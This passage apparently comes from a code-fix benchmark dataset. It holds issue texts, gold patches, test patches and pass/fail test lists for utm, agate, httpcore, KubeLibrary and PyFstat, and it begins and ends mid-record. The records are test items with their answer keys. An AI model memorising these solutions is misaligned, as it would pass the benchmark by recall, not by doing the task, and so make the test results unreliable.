if 72 <= latitude <= 84 and longitude >= 0:
- if longitude <= 9:
+ if longitude < 9:
return 31
- elif longitude <= 21:
+ elif longitude < 21:
return 33
- elif longitude <= 33:
+ elif longitude < 33:
return 35
- elif longitude <= 42:
+ elif longitude < 42:
return 37
return int((longitude + 180) / 6) + 1
|
Turbo87/utm
|
4c7c13f2b2b9c01a8581392641aeb8bbda6aba6f
|
diff --git a/test/test_utm.py b/test/test_utm.py
index 55686d7..c820cea 100755
--- a/test/test_utm.py
+++ b/test/test_utm.py
@@ -231,5 +231,22 @@ class Zone32V(unittest.TestCase):
self.assert_zone_equal(UTM.from_latlon(64, 12), 33, 'W')
+class TestRightBoundaries(unittest.TestCase):
+
+ def assert_zone_equal(self, result, expected_number):
+ self.assertEqual(result[2], expected_number)
+
+ def test_limits(self):
+ self.assert_zone_equal(UTM.from_latlon(40, 0), 31)
+ self.assert_zone_equal(UTM.from_latlon(40, 5.999999), 31)
+ self.assert_zone_equal(UTM.from_latlon(40, 6), 32)
+
+ self.assert_zone_equal(UTM.from_latlon(72, 0), 31)
+ self.assert_zone_equal(UTM.from_latlon(72, 5.999999), 31)
+ self.assert_zone_equal(UTM.from_latlon(72, 6), 31)
+ self.assert_zone_equal(UTM.from_latlon(72, 8.999999), 31)
+ self.assert_zone_equal(UTM.from_latlon(72, 9), 33)
+
+
if __name__ == '__main__':
unittest.main()
|
UTM zone exceptions error
By definition zones are left-closed, right-open intervals, e.g. zone 31: 0 <= longitude < 6.
In function latlon_to_zone_number:
```
if 72 <= latitude <= 84 and longitude >= 0:
    if longitude <= 9:
        return 31
    elif longitude <= 21:
        return 33
    elif longitude <= 33:
        return 35
    elif longitude <= 42:
        return 37
```
For latitudes >=72, this results in:
zone 31: 0 <= longitude <= 9
zone 33: 9 < longitude <= 21
zone 35: 21< longitude <= 33
zone 37: 33< longitude <= 42
but for latitudes < 72:
zone 37: 36 <= longitude < 42
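A corrected sketch of the high-latitude branch (mirroring the patch above), using left-closed, right-open intervals so that, for example, longitude 9 falls in zone 33 rather than 31:
```python
def zone_number_above_72(longitude):
    # Zone exceptions for 72 <= latitude <= 84 (Svalbard), half-open intervals.
    if longitude < 9:
        return 31
    elif longitude < 21:
        return 33
    elif longitude < 33:
        return 35
    elif longitude < 42:
        return 37
    return int((longitude + 180) / 6) + 1


assert zone_number_above_72(8.999999) == 31
assert zone_number_above_72(9) == 33
```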
|
0.0
|
4c7c13f2b2b9c01a8581392641aeb8bbda6aba6f
|
[
"test/test_utm.py::TestRightBoundaries::test_limits"
] |
[
"test/test_utm.py::KnownValues::test_from_latlon",
"test/test_utm.py::KnownValues::test_to_latlon",
"test/test_utm.py::BadInput::test_from_latlon_range_checks",
"test/test_utm.py::BadInput::test_to_latlon_range_checks",
"test/test_utm.py::Zone32V::test_above",
"test/test_utm.py::Zone32V::test_below",
"test/test_utm.py::Zone32V::test_inside",
"test/test_utm.py::Zone32V::test_left_of",
"test/test_utm.py::Zone32V::test_right_of"
] |
{
"failed_lite_validators": [],
"has_test_patch": true,
"is_lite": true
}
|
2017-06-26 10:44:15+00:00
|
mit
| 799
|
|
wireservice__agate-637
|
diff --git a/agate/aggregations/any.py b/agate/aggregations/any.py
index 70fa702..67a9651 100644
--- a/agate/aggregations/any.py
+++ b/agate/aggregations/any.py
@@ -32,7 +32,7 @@ class Any(Aggregation):
column = table.columns[self._column_name]
data = column.values()
- if isinstance(column.data_type, Boolean):
+ if isinstance(column.data_type, Boolean) and self._test is None:
return any(data)
return any(self._test(d) for d in data)
|
wireservice/agate
|
0d2671358cdea94c83bd8f28b5a6718a9326b033
|
diff --git a/tests/test_aggregations.py b/tests/test_aggregations.py
index c3c8fbb..11eefe1 100644
--- a/tests/test_aggregations.py
+++ b/tests/test_aggregations.py
@@ -138,6 +138,7 @@ class TestBooleanAggregation(unittest.TestCase):
table = Table(rows, ['test'], [Boolean()])
Any('test').validate(table)
self.assertEqual(Any('test').run(table), False)
+ self.assertEqual(Any('test', lambda r: not r).run(table), True)
def test_all(self):
rows = [
|
agate.All cannot test whether all data is False
If the column data type is boolean, the test gets overwritten to search only for True values.
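For illustration, a minimal reproduction (assuming a two-row Boolean column containing only `False` values): before the fix, the supplied test was ignored whenever the column type was `Boolean`.
```python
import agate

table = agate.Table([[False], [False]], ['test'], [agate.Boolean()])

# "Is any value falsy?" should be True, but the Boolean fast path ignored the
# supplied test and returned any(data) == False before the patch above.
print(agate.Any('test', lambda r: not r).run(table))
```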
|
0.0
|
0d2671358cdea94c83bd8f28b5a6718a9326b033
|
[
"tests/test_aggregations.py::TestBooleanAggregation::test_any"
] |
[
"tests/test_aggregations.py::TestSimpleAggregation::test_all",
"tests/test_aggregations.py::TestSimpleAggregation::test_any",
"tests/test_aggregations.py::TestSimpleAggregation::test_count",
"tests/test_aggregations.py::TestSimpleAggregation::test_count_column",
"tests/test_aggregations.py::TestSimpleAggregation::test_count_value",
"tests/test_aggregations.py::TestSimpleAggregation::test_has_nulls",
"tests/test_aggregations.py::TestSimpleAggregation::test_summary",
"tests/test_aggregations.py::TestBooleanAggregation::test_all",
"tests/test_aggregations.py::TestDateTimeAggregation::test_max",
"tests/test_aggregations.py::TestDateTimeAggregation::test_min",
"tests/test_aggregations.py::TestNumberAggregation::test_deciles",
"tests/test_aggregations.py::TestNumberAggregation::test_iqr",
"tests/test_aggregations.py::TestNumberAggregation::test_mad",
"tests/test_aggregations.py::TestNumberAggregation::test_max",
"tests/test_aggregations.py::TestNumberAggregation::test_max_precision",
"tests/test_aggregations.py::TestNumberAggregation::test_mean",
"tests/test_aggregations.py::TestNumberAggregation::test_mean_with_nulls",
"tests/test_aggregations.py::TestNumberAggregation::test_median",
"tests/test_aggregations.py::TestNumberAggregation::test_min",
"tests/test_aggregations.py::TestNumberAggregation::test_mode",
"tests/test_aggregations.py::TestNumberAggregation::test_percentiles",
"tests/test_aggregations.py::TestNumberAggregation::test_percentiles_locate",
"tests/test_aggregations.py::TestNumberAggregation::test_population_stdev",
"tests/test_aggregations.py::TestNumberAggregation::test_population_variance",
"tests/test_aggregations.py::TestNumberAggregation::test_quartiles",
"tests/test_aggregations.py::TestNumberAggregation::test_quartiles_locate",
"tests/test_aggregations.py::TestNumberAggregation::test_quintiles",
"tests/test_aggregations.py::TestNumberAggregation::test_stdev",
"tests/test_aggregations.py::TestNumberAggregation::test_sum",
"tests/test_aggregations.py::TestNumberAggregation::test_variance",
"tests/test_aggregations.py::TestTextAggregation::test_max_length",
"tests/test_aggregations.py::TestTextAggregation::test_max_length_invalid"
] |
{
"failed_lite_validators": [
"has_short_problem_statement"
],
"has_test_patch": true,
"is_lite": false
}
|
2016-10-30 16:11:15+00:00
|
mit
| 6,247
|
|
encode__httpcore-641
|
diff --git a/httpcore/_async/http11.py b/httpcore/_async/http11.py
index 7ad3664..32fa3a6 100644
--- a/httpcore/_async/http11.py
+++ b/httpcore/_async/http11.py
@@ -20,6 +20,7 @@ from .._exceptions import (
ConnectionNotAvailable,
LocalProtocolError,
RemoteProtocolError,
+ WriteError,
map_exceptions,
)
from .._models import Origin, Request, Response
@@ -84,10 +85,21 @@ class AsyncHTTP11Connection(AsyncConnectionInterface):
try:
kwargs = {"request": request}
- async with Trace("send_request_headers", logger, request, kwargs) as trace:
- await self._send_request_headers(**kwargs)
- async with Trace("send_request_body", logger, request, kwargs) as trace:
- await self._send_request_body(**kwargs)
+ try:
+ async with Trace(
+ "send_request_headers", logger, request, kwargs
+ ) as trace:
+ await self._send_request_headers(**kwargs)
+ async with Trace("send_request_body", logger, request, kwargs) as trace:
+ await self._send_request_body(**kwargs)
+ except WriteError:
+ # If we get a write error while we're writing the request,
+ # then we supress this error and move on to attempting to
+ # read the response. Servers can sometimes close the request
+ # pre-emptively and then respond with a well formed HTTP
+ # error response.
+ pass
+
async with Trace(
"receive_response_headers", logger, request, kwargs
) as trace:
diff --git a/httpcore/_sync/http11.py b/httpcore/_sync/http11.py
index edcce72..0cc100e 100644
--- a/httpcore/_sync/http11.py
+++ b/httpcore/_sync/http11.py
@@ -20,6 +20,7 @@ from .._exceptions import (
ConnectionNotAvailable,
LocalProtocolError,
RemoteProtocolError,
+ WriteError,
map_exceptions,
)
from .._models import Origin, Request, Response
@@ -84,10 +85,21 @@ class HTTP11Connection(ConnectionInterface):
try:
kwargs = {"request": request}
- with Trace("send_request_headers", logger, request, kwargs) as trace:
- self._send_request_headers(**kwargs)
- with Trace("send_request_body", logger, request, kwargs) as trace:
- self._send_request_body(**kwargs)
+ try:
+ with Trace(
+ "send_request_headers", logger, request, kwargs
+ ) as trace:
+ self._send_request_headers(**kwargs)
+ with Trace("send_request_body", logger, request, kwargs) as trace:
+ self._send_request_body(**kwargs)
+ except WriteError:
+ # If we get a write error while we're writing the request,
+ # then we supress this error and move on to attempting to
+ # read the response. Servers can sometimes close the request
+ # pre-emptively and then respond with a well formed HTTP
+ # error response.
+ pass
+
with Trace(
"receive_response_headers", logger, request, kwargs
) as trace:
|
encode/httpcore
|
80ff02f1276eba3cb6b6493b3f0b033a26d6348d
|
diff --git a/tests/_async/test_connection.py b/tests/_async/test_connection.py
index 8b29942..b6ee0c7 100644
--- a/tests/_async/test_connection.py
+++ b/tests/_async/test_connection.py
@@ -9,10 +9,13 @@ from httpcore import (
SOCKET_OPTION,
AsyncHTTPConnection,
AsyncMockBackend,
+ AsyncMockStream,
AsyncNetworkStream,
ConnectError,
ConnectionNotAvailable,
Origin,
+ RemoteProtocolError,
+ WriteError,
)
@@ -83,7 +86,109 @@ async def test_concurrent_requests_not_available_on_http11_connections():
await conn.request("GET", "https://example.com/")
+@pytest.mark.filterwarnings("ignore::pytest.PytestUnraisableExceptionWarning")
@pytest.mark.anyio
+async def test_write_error_with_response_sent():
+ """
+ If a server half-closes the connection while the client is sending
+ the request, it may still send a response. In this case the client
+ should successfully read and return the response.
+
+ See also the `test_write_error_without_response_sent` test above.
+ """
+
+ class ErrorOnRequestTooLargeStream(AsyncMockStream):
+ def __init__(self, buffer: typing.List[bytes], http2: bool = False) -> None:
+ super().__init__(buffer, http2)
+ self.count = 0
+
+ async def write(
+ self, buffer: bytes, timeout: typing.Optional[float] = None
+ ) -> None:
+ self.count += len(buffer)
+
+ if self.count > 1_000_000:
+ raise WriteError()
+
+ class ErrorOnRequestTooLarge(AsyncMockBackend):
+ async def connect_tcp(
+ self,
+ host: str,
+ port: int,
+ timeout: typing.Optional[float] = None,
+ local_address: typing.Optional[str] = None,
+ socket_options: typing.Optional[typing.Iterable[SOCKET_OPTION]] = None,
+ ) -> AsyncMockStream:
+ return ErrorOnRequestTooLargeStream(list(self._buffer), http2=self._http2)
+
+ origin = Origin(b"https", b"example.com", 443)
+ network_backend = ErrorOnRequestTooLarge(
+ [
+ b"HTTP/1.1 413 Payload Too Large\r\n",
+ b"Content-Type: plain/text\r\n",
+ b"Content-Length: 37\r\n",
+ b"\r\n",
+ b"Request body exceeded 1,000,000 bytes",
+ ]
+ )
+
+ async with AsyncHTTPConnection(
+ origin=origin, network_backend=network_backend, keepalive_expiry=5.0
+ ) as conn:
+ content = b"x" * 10_000_000
+ response = await conn.request("POST", "https://example.com/", content=content)
+ assert response.status == 413
+ assert response.content == b"Request body exceeded 1,000,000 bytes"
+
+
+@pytest.mark.anyio
+@pytest.mark.filterwarnings("ignore::pytest.PytestUnraisableExceptionWarning")
+async def test_write_error_without_response_sent():
+ """
+ If a server fully closes the connection while the client is sending
+ the request, then client should raise an error.
+
+ See also the `test_write_error_with_response_sent` test above.
+ """
+
+ class ErrorOnRequestTooLargeStream(AsyncMockStream):
+ def __init__(self, buffer: typing.List[bytes], http2: bool = False) -> None:
+ super().__init__(buffer, http2)
+ self.count = 0
+
+ async def write(
+ self, buffer: bytes, timeout: typing.Optional[float] = None
+ ) -> None:
+ self.count += len(buffer)
+
+ if self.count > 1_000_000:
+ raise WriteError()
+
+ class ErrorOnRequestTooLarge(AsyncMockBackend):
+ async def connect_tcp(
+ self,
+ host: str,
+ port: int,
+ timeout: typing.Optional[float] = None,
+ local_address: typing.Optional[str] = None,
+ socket_options: typing.Optional[typing.Iterable[SOCKET_OPTION]] = None,
+ ) -> AsyncMockStream:
+ return ErrorOnRequestTooLargeStream(list(self._buffer), http2=self._http2)
+
+ origin = Origin(b"https", b"example.com", 443)
+ network_backend = ErrorOnRequestTooLarge([])
+
+ async with AsyncHTTPConnection(
+ origin=origin, network_backend=network_backend, keepalive_expiry=5.0
+ ) as conn:
+ content = b"x" * 10_000_000
+ with pytest.raises(RemoteProtocolError) as exc_info:
+ await conn.request("POST", "https://example.com/", content=content)
+ assert str(exc_info.value) == "Server disconnected without sending a response."
+
+
+@pytest.mark.anyio
+@pytest.mark.filterwarnings("ignore::pytest.PytestUnraisableExceptionWarning")
async def test_http2_connection():
origin = Origin(b"https", b"example.com", 443)
network_backend = AsyncMockBackend(
diff --git a/tests/_sync/test_connection.py b/tests/_sync/test_connection.py
index 9e0c403..37c82e0 100644
--- a/tests/_sync/test_connection.py
+++ b/tests/_sync/test_connection.py
@@ -9,10 +9,13 @@ from httpcore import (
SOCKET_OPTION,
HTTPConnection,
MockBackend,
+ MockStream,
NetworkStream,
ConnectError,
ConnectionNotAvailable,
Origin,
+ RemoteProtocolError,
+ WriteError,
)
@@ -83,7 +86,109 @@ def test_concurrent_requests_not_available_on_http11_connections():
conn.request("GET", "https://example.com/")
+@pytest.mark.filterwarnings("ignore::pytest.PytestUnraisableExceptionWarning")
+def test_write_error_with_response_sent():
+ """
+ If a server half-closes the connection while the client is sending
+ the request, it may still send a response. In this case the client
+ should successfully read and return the response.
+
+ See also the `test_write_error_without_response_sent` test above.
+ """
+
+ class ErrorOnRequestTooLargeStream(MockStream):
+ def __init__(self, buffer: typing.List[bytes], http2: bool = False) -> None:
+ super().__init__(buffer, http2)
+ self.count = 0
+
+ def write(
+ self, buffer: bytes, timeout: typing.Optional[float] = None
+ ) -> None:
+ self.count += len(buffer)
+
+ if self.count > 1_000_000:
+ raise WriteError()
+
+ class ErrorOnRequestTooLarge(MockBackend):
+ def connect_tcp(
+ self,
+ host: str,
+ port: int,
+ timeout: typing.Optional[float] = None,
+ local_address: typing.Optional[str] = None,
+ socket_options: typing.Optional[typing.Iterable[SOCKET_OPTION]] = None,
+ ) -> MockStream:
+ return ErrorOnRequestTooLargeStream(list(self._buffer), http2=self._http2)
+
+ origin = Origin(b"https", b"example.com", 443)
+ network_backend = ErrorOnRequestTooLarge(
+ [
+ b"HTTP/1.1 413 Payload Too Large\r\n",
+ b"Content-Type: plain/text\r\n",
+ b"Content-Length: 37\r\n",
+ b"\r\n",
+ b"Request body exceeded 1,000,000 bytes",
+ ]
+ )
+
+ with HTTPConnection(
+ origin=origin, network_backend=network_backend, keepalive_expiry=5.0
+ ) as conn:
+ content = b"x" * 10_000_000
+ response = conn.request("POST", "https://example.com/", content=content)
+ assert response.status == 413
+ assert response.content == b"Request body exceeded 1,000,000 bytes"
+
+
+
+@pytest.mark.filterwarnings("ignore::pytest.PytestUnraisableExceptionWarning")
+def test_write_error_without_response_sent():
+ """
+ If a server fully closes the connection while the client is sending
+ the request, then client should raise an error.
+
+ See also the `test_write_error_with_response_sent` test above.
+ """
+
+ class ErrorOnRequestTooLargeStream(MockStream):
+ def __init__(self, buffer: typing.List[bytes], http2: bool = False) -> None:
+ super().__init__(buffer, http2)
+ self.count = 0
+
+ def write(
+ self, buffer: bytes, timeout: typing.Optional[float] = None
+ ) -> None:
+ self.count += len(buffer)
+
+ if self.count > 1_000_000:
+ raise WriteError()
+
+ class ErrorOnRequestTooLarge(MockBackend):
+ def connect_tcp(
+ self,
+ host: str,
+ port: int,
+ timeout: typing.Optional[float] = None,
+ local_address: typing.Optional[str] = None,
+ socket_options: typing.Optional[typing.Iterable[SOCKET_OPTION]] = None,
+ ) -> MockStream:
+ return ErrorOnRequestTooLargeStream(list(self._buffer), http2=self._http2)
+
+ origin = Origin(b"https", b"example.com", 443)
+ network_backend = ErrorOnRequestTooLarge([])
+
+ with HTTPConnection(
+ origin=origin, network_backend=network_backend, keepalive_expiry=5.0
+ ) as conn:
+ content = b"x" * 10_000_000
+ with pytest.raises(RemoteProtocolError) as exc_info:
+ conn.request("POST", "https://example.com/", content=content)
+ assert str(exc_info.value) == "Server disconnected without sending a response."
+
+
+
+@pytest.mark.filterwarnings("ignore::pytest.PytestUnraisableExceptionWarning")
def test_http2_connection():
origin = Origin(b"https", b"example.com", 443)
network_backend = MockBackend(
|
Handle HTTP/1.1 half-closed connections gracefully.
There's an HTTP/1.1 case that can occur where...
* The client starts sending a request.
* The server half-closes the connection.
* The server sends a response, such as an HTTP 413 Content Too Large.
Currently our behaviour is that we'll see a `WriteError` occur here and never get a response.
A more graceful behaviour is to handle this case and return the 413 response.
Prompted via https://github.com/encode/httpx/discussions/2503.
*A follow up question to this will be... is there an equivalent to this for HTTP/2 streams? But let's only consider that once we've dealt with this as a precursor.*
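A hypothetical illustration from the client's point of view (the URL and the server's 1 MB limit are made up; the mock-backend tests in the test patch exercise this scenario precisely): with the change, an oversized upload yields the server's 413 response instead of raising a `WriteError`.
```python
import httpcore

# Illustrative only: assumes a server that half-closes and answers 413
# once the request body exceeds its limit.
with httpcore.ConnectionPool() as pool:
    response = pool.request(
        "POST", "https://example.com/upload", content=b"x" * 10_000_000
    )
    print(response.status)  # expected: 413, rather than an unhandled WriteError
```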
|
0.0
|
80ff02f1276eba3cb6b6493b3f0b033a26d6348d
|
[
"tests/_async/test_connection.py::test_write_error_with_response_sent[asyncio]",
"tests/_async/test_connection.py::test_write_error_without_response_sent[asyncio]",
"tests/_async/test_connection.py::test_write_error_with_response_sent[trio]",
"tests/_async/test_connection.py::test_write_error_without_response_sent[trio]",
"tests/_sync/test_connection.py::test_write_error_with_response_sent",
"tests/_sync/test_connection.py::test_write_error_without_response_sent"
] |
[
"tests/_async/test_connection.py::test_http_connection[asyncio]",
"tests/_async/test_connection.py::test_concurrent_requests_not_available_on_http11_connections[asyncio]",
"tests/_async/test_connection.py::test_http2_connection[asyncio]",
"tests/_async/test_connection.py::test_request_to_incorrect_origin[asyncio]",
"tests/_async/test_connection.py::test_connection_retries[asyncio]",
"tests/_async/test_connection.py::test_connection_retries_tls[asyncio]",
"tests/_async/test_connection.py::test_uds_connections[asyncio]",
"tests/_async/test_connection.py::test_http_connection[trio]",
"tests/_async/test_connection.py::test_concurrent_requests_not_available_on_http11_connections[trio]",
"tests/_async/test_connection.py::test_http2_connection[trio]",
"tests/_async/test_connection.py::test_request_to_incorrect_origin[trio]",
"tests/_async/test_connection.py::test_connection_retries[trio]",
"tests/_async/test_connection.py::test_connection_retries_tls[trio]",
"tests/_async/test_connection.py::test_uds_connections[trio]",
"tests/_sync/test_connection.py::test_http_connection",
"tests/_sync/test_connection.py::test_concurrent_requests_not_available_on_http11_connections",
"tests/_sync/test_connection.py::test_http2_connection",
"tests/_sync/test_connection.py::test_request_to_incorrect_origin",
"tests/_sync/test_connection.py::test_connection_retries",
"tests/_sync/test_connection.py::test_connection_retries_tls",
"tests/_sync/test_connection.py::test_uds_connections"
] |
{
"failed_lite_validators": [
"has_hyperlinks",
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2022-12-13 19:52:44+00:00
|
bsd-3-clause
| 2,109
|
|
devopsspiral__KubeLibrary-124
|
diff --git a/CHANGELOG.md b/CHANGELOG.md
index b7b2f42..e8800dd 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -5,8 +5,14 @@ The format is based on [Keep a Changelog](http://keepachangelog.com/)
and this project adheres to [Semantic Versioning](http://semver.org/).
## In progress
+
+## [0.8.1] - 2022-12-16
+### Added
- Add proxy configuration fetched from `HTTP_PROXY` or `http_proxy` environment variable
+### Fixed
+Fix disabling cert validation [#124](https://github.com/devopsspiral/KubeLibrary/pull/124)
+
## [0.8.0] - 2022-10-27
### Added
- Add function list_namespaced_stateful_set_by_pattern [#114](https://github.com/devopsspiral/KubeLibrary/pull/113) by [@siaomingjeng](https://github.com/siaomingjeng)
diff --git a/src/KubeLibrary/KubeLibrary.py b/src/KubeLibrary/KubeLibrary.py
index 3f73adc..ebff896 100755
--- a/src/KubeLibrary/KubeLibrary.py
+++ b/src/KubeLibrary/KubeLibrary.py
@@ -1,6 +1,5 @@
import json
import re
-import ssl
import urllib3
from os import environ
@@ -276,7 +275,7 @@ class KubeLibrary:
def _add_api(self, reference, class_name):
self.__dict__[reference] = class_name(self.api_client)
if not self.cert_validation:
- self.__dict__[reference].api_client.rest_client.pool_manager.connection_pool_kw['cert_reqs'] = ssl.CERT_NONE
+ self.__dict__[reference].api_client.configuration.verify_ssl = False
def k8s_api_ping(self):
"""Performs GET on /api/v1/ for simple check of API availability.
diff --git a/src/KubeLibrary/version.py b/src/KubeLibrary/version.py
index 8675559..73baf8f 100644
--- a/src/KubeLibrary/version.py
+++ b/src/KubeLibrary/version.py
@@ -1,1 +1,1 @@
-version = "0.8.0"
+version = "0.8.1"
|
devopsspiral/KubeLibrary
|
7f4037c283a38751f9a31160944a17e7b80ec97b
|
diff --git a/test/test_KubeLibrary.py b/test/test_KubeLibrary.py
index b99291b..7cae67e 100644
--- a/test/test_KubeLibrary.py
+++ b/test/test_KubeLibrary.py
@@ -1,7 +1,6 @@
import json
import mock
import re
-import ssl
import unittest
from KubeLibrary import KubeLibrary
from KubeLibrary.exceptions import BearerTokenWithPrefixException
@@ -306,7 +305,7 @@ class TestKubeLibrary(unittest.TestCase):
kl = KubeLibrary(kube_config='test/resources/k3d', cert_validation=False)
for api in TestKubeLibrary.apis:
target = getattr(kl, api)
- self.assertEqual(target.api_client.rest_client.pool_manager.connection_pool_kw['cert_reqs'], ssl.CERT_NONE)
+ self.assertEqual(target.api_client.configuration.verify_ssl, False)
@responses.activate
def test_KubeLibrary_inits_with_bearer_token(self):
|
certificate verify failed issue when using Get Namespaced Pod Exec
When using the Get Namespaced Pod Exec keyword on a k8s cluster using a custom CA, the following error occurs:
```
ssl.SSLCertVerificationError: [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: unable to get issuer certificate (_ssl.c:1129)
```
Other keywords (Read Namespaced Pod Status, List Namespaced Pod By Pattern ...) are working as expected.
As a quick fix, I'm adding the following line in the `_add_api` method of the library:
```
    def _add_api(self, reference, class_name):
        self.__dict__[reference] = class_name(self.api_client)
        if not self.cert_validation:
            self.__dict__[reference].api_client.rest_client.pool_manager.connection_pool_kw['cert_reqs'] = ssl.CERT_NONE
            self.__dict__[reference].api_client.configuration.verify_ssl = False
```
Am I missing something regarding the library configuration?
Versions :
```
KubeLibrary: 0.8.0
Python: 3.9.13
Kubernetes: 1.24
```
KubeLibrary :
```
Library KubeLibrary kube_config=${KUBECONFIG_FILE} cert_validation=False
KubeLibrary.Get Namespaced Pod Exec
... name=my-pod
... namespace=${namespace}
... argv_cmd=${command}
```
|
0.0
|
7f4037c283a38751f9a31160944a17e7b80ec97b
|
[
"test/test_KubeLibrary.py::TestKubeLibrary::test_list_namespaced_deployment_by_pattern"
] |
[
"test/test_KubeLibrary.py::TestKubeLibrary::test_KubeLibrary_dynamic_delete",
"test/test_KubeLibrary.py::TestKubeLibrary::test_list_namespace",
"test/test_KubeLibrary.py::TestKubeLibrary::test_KubeLibrary_inits_with_bearer_token",
"test/test_KubeLibrary.py::TestKubeLibrary::test_read_namespaced_endpoints",
"test/test_KubeLibrary.py::TestKubeLibrary::test_list_namespaced_daemon_set",
"test/test_KubeLibrary.py::TestKubeLibrary::test_inits_all_api_clients",
"test/test_KubeLibrary.py::TestKubeLibrary::test_assert_pod_has_annotations",
"test/test_KubeLibrary.py::TestKubeLibrary::test_list_namespaced_secret_by_pattern",
"test/test_KubeLibrary.py::TestKubeLibrary::test_KubeLibrary_dynamic_create",
"test/test_KubeLibrary.py::TestKubeLibrary::test_get_namespaced_exec_without_container",
"test/test_KubeLibrary.py::TestKubeLibrary::test_read_namespaced_cron_job",
"test/test_KubeLibrary.py::TestKubeLibrary::test_read_namespaced_ingress",
"test/test_KubeLibrary.py::TestKubeLibrary::test_list_namespaced_service_account_by_pattern",
"test/test_KubeLibrary.py::TestKubeLibrary::test_read_namespaced_horizontal_pod_autoscaler",
"test/test_KubeLibrary.py::TestKubeLibrary::test_assert_container_has_env_vars",
"test/test_KubeLibrary.py::TestKubeLibrary::test_list_namespaced_ingress",
"test/test_KubeLibrary.py::TestKubeLibrary::test_KubeLibrary_dynamic_replace",
"test/test_KubeLibrary.py::TestKubeLibrary::test_list_namespaced_job_by_pattern",
"test/test_KubeLibrary.py::TestKubeLibrary::test_KubeLibrary_inits_with_context",
"test/test_KubeLibrary.py::TestKubeLibrary::test_read_namespaced_daemon_set",
"test/test_KubeLibrary.py::TestKubeLibrary::test_get_matching_pods_in_namespace",
"test/test_KubeLibrary.py::TestKubeLibrary::test_get_namespaced_exec_not_argv_and_list",
"test/test_KubeLibrary.py::TestKubeLibrary::test_get_configmaps_in_namespace",
"test/test_KubeLibrary.py::TestKubeLibrary::test_list_cluster_role_binding",
"test/test_KubeLibrary.py::TestKubeLibrary::test_filter_containers_images",
"test/test_KubeLibrary.py::TestKubeLibrary::test_filter_pods_containers_statuses_by_name",
"test/test_KubeLibrary.py::TestKubeLibrary::test_evaluate_callable_from_k8s_client",
"test/test_KubeLibrary.py::TestKubeLibrary::test_list_namespaced_persistent_volume_claim_by_pattern",
"test/test_KubeLibrary.py::TestKubeLibrary::test_KubeLibrary_dynamic_init",
"test/test_KubeLibrary.py::TestKubeLibrary::test_get_kubelet_version",
"test/test_KubeLibrary.py::TestKubeLibrary::test_list_namespaced_role_binding",
"test/test_KubeLibrary.py::TestKubeLibrary::test_generate_alphanumeric_str",
"test/test_KubeLibrary.py::TestKubeLibrary::test_KubeLibrary_inits_from_kubeconfig",
"test/test_KubeLibrary.py::TestKubeLibrary::test_assert_pod_has_labels",
"test/test_KubeLibrary.py::TestKubeLibrary::test_filter_pods_containers_by_name",
"test/test_KubeLibrary.py::TestKubeLibrary::test_KubeLibrary_dynamic_patch",
"test/test_KubeLibrary.py::TestKubeLibrary::test_KubeLibrary_inits_with_bearer_token_with_ca_crt",
"test/test_KubeLibrary.py::TestKubeLibrary::test_list_namespaced_role",
"test/test_KubeLibrary.py::TestKubeLibrary::test_filter_containers_resources",
"test/test_KubeLibrary.py::TestKubeLibrary::test_get_namespaced_exec_with_container",
"test/test_KubeLibrary.py::TestKubeLibrary::test_KubeLibrary_fails_for_wrong_context",
"test/test_KubeLibrary.py::TestKubeLibrary::test_list_namespaced_stateful_set_by_pattern",
"test/test_KubeLibrary.py::TestKubeLibrary::test_list_namespaced_persistent_volume_claim",
"test/test_KubeLibrary.py::TestKubeLibrary::test_list_namespaced_horizontal_pod_autoscaler",
"test/test_KubeLibrary.py::TestKubeLibrary::test_KubeLibrary_dynamic_get",
"test/test_KubeLibrary.py::TestKubeLibrary::test_read_namespaced_service",
"test/test_KubeLibrary.py::TestKubeLibrary::test_list_namespaced_service",
"test/test_KubeLibrary.py::TestKubeLibrary::test_inits_with_bearer_token_raises_BearerTokenWithPrefixException",
"test/test_KubeLibrary.py::TestKubeLibrary::test_read_namespaced_pod_status",
"test/test_KubeLibrary.py::TestKubeLibrary::test_list_namespaced_replica_set_by_pattern",
"test/test_KubeLibrary.py::TestKubeLibrary::test_list_namespaced_cron_job",
"test/test_KubeLibrary.py::TestKubeLibrary::test_list_namespaced_pod_by_pattern",
"test/test_KubeLibrary.py::TestKubeLibrary::test_list_cluster_role"
] |
{
"failed_lite_validators": [
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2022-12-16 14:17:09+00:00
|
mit
| 1,894
|
|
PyFstat__PyFstat-489
|
diff --git a/docs/source/pyfstat.utils.rst b/docs/source/pyfstat.utils.rst
index 260c2a7..1465894 100644
--- a/docs/source/pyfstat.utils.rst
+++ b/docs/source/pyfstat.utils.rst
@@ -7,7 +7,7 @@ Most of these are used internally by other parts of the package
and are of interest mostly only for developers,
but others can also be helpful for end users.
-Functions in these modules can be directly acessed via ``pyfstat.utils``
+Functions in these modules can be directly accessed via ``pyfstat.utils``
without explicitly mentioning the specific module in where they reside.
(E.g. just call ``pyfstat.utils.some_function``,
not ``pyfstat.utils.some_topic.some_function``.)
@@ -15,6 +15,14 @@ not ``pyfstat.utils.some_topic.some_function``.)
Submodules
----------
+pyfstat.utils.atoms module
+--------------------------
+
+.. automodule:: pyfstat.utils.atoms
+ :members:
+ :undoc-members:
+ :show-inheritance:
+
pyfstat.utils.cli module
------------------------
diff --git a/pyfstat/core.py b/pyfstat/core.py
index 9f0b3f1..023ec12 100644
--- a/pyfstat/core.py
+++ b/pyfstat/core.py
@@ -1317,19 +1317,10 @@ class ComputeFstat(BaseSearchClass):
# and return the maximum of that?
idx_maxTwoF = self.FstatMap.get_maxF_idx()
for X in range(self.FstatResults.numDetectors):
- # For each detector, we need to build a MultiFstatAtomVector
- # because that's what the Fstat map function expects.
- singleIFOmultiFatoms = lalpulsar.CreateMultiFstatAtomVector(1)
- # The first [0] index on the multiFatoms here is over frequency bins;
+ # The [0] index on the multiFatoms here is over frequency bins;
# we always operate on a single bin.
- singleIFOmultiFatoms.data[0] = lalpulsar.CreateFstatAtomVector(
- self.FstatResults.multiFatoms[0].data[X].length
- )
- singleIFOmultiFatoms.data[0].TAtom = (
- self.FstatResults.multiFatoms[0].data[X].TAtom
- )
- singleIFOmultiFatoms.data[0].data = (
- self.FstatResults.multiFatoms[0].data[X].data
+ singleIFOmultiFatoms = utils.extract_singleIFOmultiFatoms_from_multiAtoms(
+ self.FstatResults.multiFatoms[0], X
)
